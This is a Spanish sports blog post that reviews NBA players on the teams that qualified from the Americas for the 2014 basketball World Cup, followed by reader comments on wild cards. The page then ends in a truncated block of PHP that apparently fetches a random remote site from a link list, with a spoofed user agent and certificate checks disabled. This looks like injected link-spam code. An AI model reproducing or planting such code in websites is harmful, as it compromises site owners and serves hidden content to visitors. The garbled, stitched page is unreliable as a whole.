Luis Scola lleva a Argentina al Mundial

09 de September de 2013 por txusma

Ya conocemos a los clasificados americanos para el Mundial de 2014. Tras una última jornada de infarto, con un partido a cara o cruz entre Argentina y Canadá, serán los albicelestes, más Puerto Rico, México y República Dominicana los que viajarán a España. A punto ha estado Venezuela de hacer historia y clasificarse pero una derrota de un solo punto ante Puerto Rico resultó funesta para sus aspiraciones. Gran torneo de mexicanos y dominicanos que vuelven al Mundial después de muchos años. En todos los equipos clasificados los jugadores NBA han sido claves. Demos un repaso a sus actuaciones en esta segunda fase:

Luis Scola: Ya pueden en Argentina darle las gracia a Luis Scola. Si en la primera fase estuvo algo irregular en esta segunda ha resultado decisivo. Impresionante actuación en el partido a todo o nada contra Canadá. Finalizó con 28 puntos y 7 rebotes. 

Gustavo Ayón: Ha mantenido el nivel aunque bajó un poco el listón en el aspecto reboteador. Lleva 16’4 puntos de media y eso que ante Puerto Rico, con ambos equipos ya clasificados, prácticamente no jugó.

J.J. Barea: Gran torneo del de Puerto Rico. Ante Venezuela sacó a relucir todo su arsenal y acabó con 30 puntos y 6 asistencias. Si hubieran perdido aquel partido las cosas se les podían haber complicado en la última jornada.

Francisco García: Gran segunda fase del jugador de los Rockets. Los dominicanos han ganado los 4 partidos que han jugado y en los 3 últimos García ha sido pieza clave disputando más de 32 minutos por partido. A destacar los 18 puntos y 6 rebotes que sirvieron para romper la imbatibilidad de Puerto Rico.

Tristan Thompson: Ante Venezuela se fue a los 20 rebotes (7 en ataque). Ha dado toda una exhibición anotadora pero sus malos porcentajes de tiro le han lastrado.

Andrew Nicholson: Ante República Dominicana le dieron minutos y se fue a los 29 puntos, eso sí, perdiendo 6 balones. También respondió con un buen partido ante Argentina (17 puntos y 4 rebotes).

Cory Joseph: Enorme torneo el suyo. Empezó con un 17-8-6 que dio la victoria a su equipo frente Mexico y mantuvo el tono en el resto de los partidos. Ante Argentina también fue de los destacados.

Joel Anthony: Ha seguido cumpliendo con su rol y no ha pasado de los 8 puntos que metió en el partido frente Venezuela.

Comenta

6 comentarios a esta entrada

  1. Simon dice:
    #1

    Una lástima que se haya quedado Canadá fuera… con los talentos jovenes que tienen puede ser un equipo a tener en cuenta en los próximos años si sus mejores jugadores se comprometen con la selección. A ver que pasa todavía hay para repartir alguna que otra Wild Car para el mundial ( no se cuantas, pero alguna que otra hay ), aunque seguro que irá a algún equipo europeo que seguramente de mas guerra.

      Citar

  2. Nacho dice:
    #2

    Simon:
    Una lástima que se haya quedado Canadá fuera… con los talentos jovenes que tienen puede ser un equipo a tener en cuenta en los próximos años si sus mejores jugadores se comprometen con la selección. A ver que pasa todavía hay para repartir alguna que otra Wild Car para el mundial ( no se cuantas, pero alguna que otra hay ), aunque seguro que irá a algún equipo europeo que seguramente de mas guerra.

    Son cuatro.
    Supongo que no todas irán a Europa. También China se ha quedado fuera. Pueden dar dos Europa, una Asia (China) y otra América (Canadá). Lo que pasa es que en Europa se quedan fuera de momento Rusia, Turquía, Alemania. Lituania ha estado a un triple de Teletovic (que no entró) de quedarse fuera también.
    Vamos, que va a ver hostias por las wild cards.
    Supongo que Turquía se la llevará (plata en el último mundial y bronce en JJOO), Alemania lo que quiera Nowitzky y Rusia es mucha tela.
    Va a ser más interesante la reunión de la FIBA que este europeo, jejeje.

      Citar

  3. txusma dice:
    #3

    Difícil lo tiene Canadá cuando Brasil se ha quedado fuera. Supongo que si hay una Wild Car en América será para ellos. La pela es la pela.

      Citar

  4. Simon dice:
    #4

    Hombre Canadá depende de lo que hagan y decidan Bennet y Wiggins, no creo que la FIBA dejara de lado el reclamo que sería tener a una selección con los dos ultimos nº1 del draft y el posible ROY…
    Por otro lado, suponiendo que las 6 plazas que da el Eurobasket vayan a ser para Italia, Eslovenia, Francia, Serbia, Lituania y ( Grecia o Croacia ) pues nos quedan con opciones reales de conseguir esa WC a Croacia, Rusia y Turquia… doy por seguro una a Rusia… y las otras selecciones no creo que entusiasmen demasiado asi que tampoco es de descartar que este año America se pudiera llevar dos e invitaran a Brasil también.
    La verdad es que la de China si que se la podrían ahorrar, puesto que a nivel deportivo poco iba a aportar al torneo pero como dice Txus la pela es la pela…
    yo creo que sería mejor repartir por ejemplo 6 o 8 Wild Car y que se hiciera algún premundial ese mismo verano y ahi salieran los 4 repescados para el Mundial

      Citar

  5. Simon dice:
    #5

    acabo de caer de que con Brasil también influirá mucho el hecho de que en un par de años organizan las olimpiadas… desde luego que va a estar complicado repartirlas este año por que equipos habituales y con peso como Rusia, Brasil y China no han conseguido ganarse ese derecho… lo cuál complica las elecciones, no es lo mismo pasar de America y no darle ninguna WC siendo los candidatos Dominicana o Mexico o pasar de Asia siendo los candidatos Japon o Korea… este año están mas comprometidas que nunca

      Citar

  6. Simon dice:
    #6

    Solo un par de cosas más… que se me ha olvidado comentar antes… Creo que la FIBA da muchas plazas a Asia con 3… al igual a Oceanía con 2…
    Para mi entre esas dos zonas tendria que haber 4 plazas… 2 directas para Asia, una para Oceanía y otra para una repesca entre ambas confederaciones…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>